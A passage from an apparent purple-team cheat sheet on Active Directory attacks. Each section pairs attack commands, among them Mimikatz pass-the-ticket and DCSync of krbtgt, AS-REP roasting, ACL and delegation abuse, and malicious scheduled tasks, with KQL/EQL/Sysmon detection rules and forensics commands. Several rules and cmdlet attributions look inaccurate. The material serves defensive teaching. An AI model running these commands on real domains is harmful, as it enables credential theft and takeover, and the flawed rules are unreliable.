Captures Kerberos traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Kerberoasting

KQL Rule: Unusual Kerberos Service Ticket Requests

| where EventID == 4769
| where ServiceName !contains 'krbtgt' and TicketOptions has '0x40810000'
| project TimeGenerated, AccountName, ServiceName, TicketOptions

EQL Rule: Anomalous Kerberos Service Ticket Activity

sequence by AccountName
  [security where EventID == 4672]
  [security where EventID == 4769 and ServiceName !contains 'krbtgt'] by AccountName
| where sequence.count > 5

Purple Team Cheat Sheet: Pass the Ticket Attack Scenario

Attack Technique and Command


Pass the Ticket

mimikatz.exe "kerberos::ptt <ticket.kirbi>"

Uses Mimikatz to pass a Kerberos ticket for authentication.

Pass the Ticket

Invoke-Mimikatz -Command '"kerberos::ptt <ticket.kirbi>"'

Uses PowerShell and Mimikatz to pass a Kerberos ticket.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


An account was successfully logged on.



Special Privileges Assigned to New Logon



Kerberos Authentication Ticket (TGT) was requested


Forensics Commands and Codes


tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

Captures Kerberos traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Pass the Ticket Usage

KQL Rule: Suspicious Kerberos Ticket Use

| where EventID == 4624 and LogonType == 9
| project TimeGenerated, AccountName, LogonType, IpAddress

EQL Rule: Anomalous Kerberos Ticket Assignments

sequence by AccountName
  [security where EventID == 4672]
  [security where EventID == 4624 and LogonType == 9] by AccountName
| where sequence.count > 5

KQL Rule: Abnormal Kerberos TGT Requests

| where EventID == 4768
| where TicketOptions has '0x40810000'
| project TimeGenerated, AccountName, ServiceName, TicketOptions

Purple Team Cheat Sheet: DCSync Attack Scenario

Attack Technique and Command



mimikatz.exe "lsadump::dcsync /user:krbtgt /domain:yourdomain.com"

Uses Mimikatz to simulate the behavior of a Domain Controller and request account password data.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


An operation was performed on an object



Special Privileges Assigned to New Logon



Kerberos Authentication Ticket (TGT) was requested


Forensics Commands and Codes


tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

Captures Kerberos traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting DCSync Usage

KQL Rule: Unusual Directory Service Access

| where EventID == 4662
| where ObjectProperties contains 'Replicating Directory Changes'
| project TimeGenerated, AccountName, ObjectProperties

EQL Rule: Anomalous Directory Replication Requests

sequence by AccountName
  [security where EventID == 4672]
  [security where EventID == 4662 and ObjectProperties contains 'Replicating Directory Changes'] by AccountName
| where sequence.count > 5

KQL Rule: Suspicious Kerberos TGT Requests

| where EventID == 4768
| where TicketOptions has '0x40810000'
| project TimeGenerated, AccountName, ServiceName, TicketOptions

Purple Team Cheat Sheet: AS-REP Roasting Attack Scenario

Attack Technique and Command


AS-REP Roasting

GetNPUsers.py -request -dc-ip <DC_IP> <DOMAIN>/ -usersfile users.txt

Uses GetNPUsers.py to request AS-REP for users without pre-authentication.

AS-REP Roasting

Rubeus.exe asreproast

Uses Rubeus to perform AS-REP roasting on the domain.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


Kerberos Authentication Ticket (TGT) was requested



Kerberos Service Ticket (TGS) was requested



Kerberos pre-authentication failed


Forensics Commands and Codes


tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

Captures Kerberos traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting AS-REP Roasting

KQL Rule: Unusual Kerberos TGT Requests without Pre-Authentication

| where EventID == 4768
| where TicketOptions has '0x40810000' and TicketEncryptionType == 0x17
| project TimeGenerated, AccountName, ServiceName, TicketOptions, TicketEncryptionType

EQL Rule: Anomalous Kerberos Pre-Authentication Failures

sequence by AccountName
  [security where EventID == 4771]
  [security where EventID == 4768 and TicketOptions has '0x40810000' and TicketEncryptionType == 0x17] by AccountName
| where sequence.count > 5

KQL Rule: Suspicious Kerberos Service Ticket Requests

| where EventID == 4769
| where ServiceName contains 'krbtgt' and TicketEncryptionType == 0x17
| project TimeGenerated, AccountName, ServiceName, TicketEncryptionType

Purple Team Cheat Sheet: GenericWrite Attack Scenario

Attack Technique and Command



Set-DomainObjectAcl -TargetIdentity "CN=GroupName,OU=Groups,DC=domain,DC=com" -PrincipalIdentity "hacker" -Rights GenericWrite

Uses PowerView to modify the ACL of a domain object, granting GenericWrite rights to an attacker.


Add-DomainObjectAcl -TargetIdentity "CN=GroupName,OU=Groups,DC=domain,DC=com" -PrincipalIdentity "hacker" -Rights All

Adds an ACL entry to a domain object, granting full rights to an attacker.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


A directory service object was modified



An operation was performed on an object



A member was added to a security-enabled global group


Forensics Commands and Codes


log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

tcpdump -i eth0 -w network_traffic.pcap

Captures network traffic for analysis.

Full Raw KQL/EQL Rules for Detecting GenericWrite Usage

KQL Rule: Unusual Directory Service Object Modifications

| where EventID == 5136
| project TimeGenerated, AccountName, ObjectDN, AttributeLDAPDisplayName, AttributeValue

EQL Rule: Anomalous ACL Changes

sequence by AccountName
  [security where EventID == 4662 and ObjectProperties contains 'WriteProperty']
  [security where EventID == 4728] by AccountName
| where sequence.count > 5

KQL Rule: Suspicious Group Membership Changes

| where EventID == 4728
| project TimeGenerated, AccountName, MemberName, TargetSid

Purple Team Cheat Sheet: Domain Trust Attack Scenario

Attack Technique and Command


Domain Trust Exploitation

Get-DomainTrustMapping -API

Uses PowerView to enumerate domain trusts.

Domain Trust Exploitation

Get-NetDomainTrust -Domain yourdomain.com

Enumerates domain trusts using PowerSploit.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


Kerberos Service Ticket (TGS) was requested



Special Privileges Assigned to New Logon



Successful Account Logon


Forensics Commands and Codes


tcpdump -i eth0 port 88 -w kerberos_traffic.pcap

Captures Kerberos traffic for analysis.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

Full Raw KQL/EQL Rules for Detecting Domain Trust Abuse

KQL Rule: Unusual Kerberos Service Ticket Requests Across Domains

| where EventID == 4769
| where ServiceName contains 'krbtgt' and TicketOptions has '0x40810000'
| project TimeGenerated, AccountName, ServiceName, TicketOptions, IpAddress

EQL Rule: Anomalous Domain Trust Activity

sequence by AccountName
  [security where EventID == 4672]
  [security where EventID == 4769 and ServiceName contains 'krbtgt'] by AccountName
| where sequence.count > 5

KQL Rule: Suspicious Cross-Domain Logon Types

| where EventID == 4624 and LogonType == 3
| where TargetDomainName != "yourdomain.com"
| project TimeGenerated, AccountName, LogonType, TargetDomainName, IpAddress

Purple Team Cheat Sheet: SEBackup Privilege, SeLoadDriverPrivilege, and ForceChangePassword Abuse

Attack Techniques and Commands


SEBackup Privilege Abuse

Get-SeBackupPrivilege -ComputerName target

Uses PowerSploit to exploit SEBackup privilege on a target computer.

SeLoadDriverPrivilege Module

Invoke-SeLoadDriverPrivilege -ComputerName target -DriverPath path_to_driver

Uses a custom module to load a driver using SeLoadDriverPrivilege.

ForceChangePassword Abuse

Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)

Forces a password change for a domain user using PowerView.

Detection: Event Codes and KQL/EQL Rules

Event CodeDescriptionKQL/EQL Rule


Special Privileges Assigned to New Logon



A new process has been created



A member was added to a security-enabled global group


Forensics Commands and Codes


log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

tcpdump -i eth0 -w network_traffic.pcap

Captures network traffic for analysis.

Full Raw KQL/EQL Rules for Detecting Malicious Patterns

KQL Rule: Unusual Use of SEBackup Privilege

| where EventID == 4672
| where PrivilegeList contains 'SeBackupPrivilege'
| project TimeGenerated, AccountName, PrivilegeList

EQL Rule: Suspicious Driver Loading Activity

sequence by Hostname, AccountName
  [process where EventID == 4688 and NewProcessName contains 'powershell.exe']
  [process where EventID == 4688 and CommandLine contains 'Invoke-SeLoadDriverPrivilege'] by Hostname, AccountName
| where sequence.count > 2

KQL Rule: Abnormal Changes to User Passwords

| where EventID == 4728
| where MemberSid contains 'S-1-5-21-' and TargetUserName contains 'user'
| project TimeGenerated, MemberSid, TargetUserName

Purple Team Cheat Sheet: DLL Sideloading Attack Scenario

Attack Technique and Command


DLL Sideloading

copy evil.dll C:\Path\To\Legitimate\Application\

Places a malicious DLL in a directory where a legitimate application will load it.

Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules

Event CodeDescriptionKQL/EQL RuleSysmon/Wazuh Rule


A new process has been created


where EventID == 4688 and NewProcessName contains 'legitimate_application.exe'`


Image loaded (Sysmon)


where EventID == 7 and ImageLoaded contains 'evil.dll'`


Process creation (Sysmon)


where EventID == 1 and ParentImage contains 'legitimate_application.exe'`

Forensics Commands and Codes


log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

volatility -f memory_dump.raw --profile=Win10x64_18362 dlllist

Lists loaded DLLs in a memory dump.

tcpdump -i eth0 -w network_traffic.pcap

Captures network traffic for analysis.

Full Raw KQL/EQL Rules for Detecting DLL Sideloading

KQL Rule: Suspicious DLL Load Patterns

| where EventID == 7
| where ImageLoaded contains 'evil.dll' and Image contains 'legitimate_application.exe'
| project TimeGenerated, Computer, Image, ImageLoaded

EQL Rule: Anomalous DLL Loading Activity

sequence by Hostname, Image
  [process where EventID == 1 and ParentImage contains 'legitimate_application.exe']
  [dll where EventID == 7 and ImageLoaded contains 'evil.dll'] by Hostname, Image
| where sequence.count > 2

Sysmon/Wazuh Rule: Malicious DLL Load Detection

- rule.id: 7
  field: sysmon.image_loaded
  value: 'evil.dll'
- rule.id: 1
  field: sysmon.parent_image
  value: 'legitimate_application.exe'

Purple Team Cheat Sheet: Process Hollowing and Process Doppelgänging

Attack Techniques and Commands


Process Hollowing

Invoke-ProcessHollowing -SourcePath "C:\Windows\System32\svchost.exe" -TargetPath "C:\Path\To\Malicious.exe"

Uses a PowerShell script to perform process hollowing.

Process Doppelgänging

Invoke-ProcessDoppelganging -Target "C:\Windows\System32\notepad.exe" -Payload "C:\Path\To\Malicious.exe" -Doppelganger "C:\Windows\System32\svchost.exe"

Executes Process Doppelgänging using a custom tool or script.

Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules

Event CodeDescriptionKQL/EQL RuleSysmon/Wazuh Rule


A new process has been created


where EventID == 4688 and NewProcessName contains 'notepad.exe'`


Process creation (Sysmon)


where EventID == 1 and ParentImage contains 'svchost.exe'`


Image loaded (Sysmon)


where EventID == 7 and ImageLoaded contains 'malicious.dll'`

Forensics Commands and Codes


log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

volatility -f memory_dump.raw --profile=Win10x64_18362 pslist

Lists running processes in a memory dump.

tcpdump -i eth0 -w network_traffic.pcap

Captures network traffic for analysis.

Full Raw KQL/EQL Rules for Detecting Process Hollowing and Doppelgänging

KQL Rule: Suspicious Process Creation Patterns

| where EventID == 1
| where ParentImage contains 'svchost.exe' and ProcessName contains 'notepad.exe'
| project TimeGenerated, Computer, ParentImage, ProcessName

EQL Rule: Anomalous Process Execution

sequence by Hostname, Image
  [process where EventID == 1 and ParentImage contains 'svchost.exe']
  [process where EventID == 1 and ProcessName contains 'notepad.exe'] by Hostname, Image
| where sequence.count > 2

Sysmon/Wazuh Rule: Malicious Image Load Detection

- rule.id: 7
  field: sysmon.image_loaded
  value: 'malicious.dll'
- rule.id: 1
  field: sysmon.parent_image
  value: 'svchost.exe'

Purple Team Cheat Sheet: Abusing Delegation in Active Directory

Attack Techniques and Commands


Unconstrained Delegation Abuse

Set-ADComputer -Identity "targetComputer" -TrustedForDelegation $true

Configures a computer for unconstrained delegation using PowerShell.

Constrained Delegation Abuse

Set-ADComputer -Identity "targetComputer" -PrincipalsAllowedToDelegateToAccount "attackerAccount"

Sets constrained delegation on a target computer to an attacker's account.

Resource-Based Constrained Delegation Abuse

Add-ADComputerServiceAccount -Identity "targetComputer" -ServiceAccount "attackerAccount"

Abuses resource-based constrained delegation by assigning a service account to the target computer.

Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules

Event CodeDescriptionKQL/EQL RuleSysmon/Wazuh Rule


A directory service object was modified


where EventID == 5136 and ObjectClass == 'computer' and AttributeLDAPDisplayName == 'msDS-AllowedToDelegateTo'`


A computer account was changed


where EventID == 4742 and ObjectType == 'computer'`


Special Privileges Assigned to New Logon


where EventID == 4672`

Forensics Commands and Codes


log2timeline.py -z UTC -o L2tcsv timeline.plaso -w timeline.csv

Extracts timeline from forensic images.

volatility -f memory_dump.raw --profile=Win10x64_18362 netscan

Scans for network artifacts in a memory dump.

tcpdump -i eth0 -w network_traffic.pcap

Captures network traffic for analysis.

Full Raw KQL/EQL Rules for Detecting Delegation Abuse

KQL Rule: Unusual Changes to Computer Objects

| where EventID == 5136
| where ObjectClass == 'computer' and AttributeLDAPDisplayName == 'msDS-AllowedToDelegateTo'
| project TimeGenerated, AccountName, ObjectDN, AttributeValue

EQL Rule: Anomalous Computer Account Modifications

sequence by AccountName
  [security where EventID == 4742 and ObjectType == 'computer']
  [security where EventID == 4672] by AccountName
| where sequence.count > 5

Sysmon/Wazuh Rule: Suspicious Computer Account Changes

- rule.id: 12
  field: sysmon.target_object
  value: 'msDS-AllowedToDelegateTo'
- rule.id: 4672
  field: sysmon.subject_user_name
  value: 'targetComputer'

Purple Team Cheat Sheet: Scheduling Tasks in Windows and Linux

Attack Techniques and Commands


Windows Task Scheduling

schtasks /create /tn "TaskName" /tr "C:\Path\To\Malicious.exe" /sc daily /st 00:00

Creates a scheduled task in Windows to execute a malicious file.

Linux Cron Job Scheduling

`echo "* * * * * /path/to/malicious.sh"

crontab -`

Detection: Event Codes, KQL/EQL, Sysmon, and Wazuh Rules

Event CodeDescriptionKQL/EQL RuleSysmon/Wazuh Rule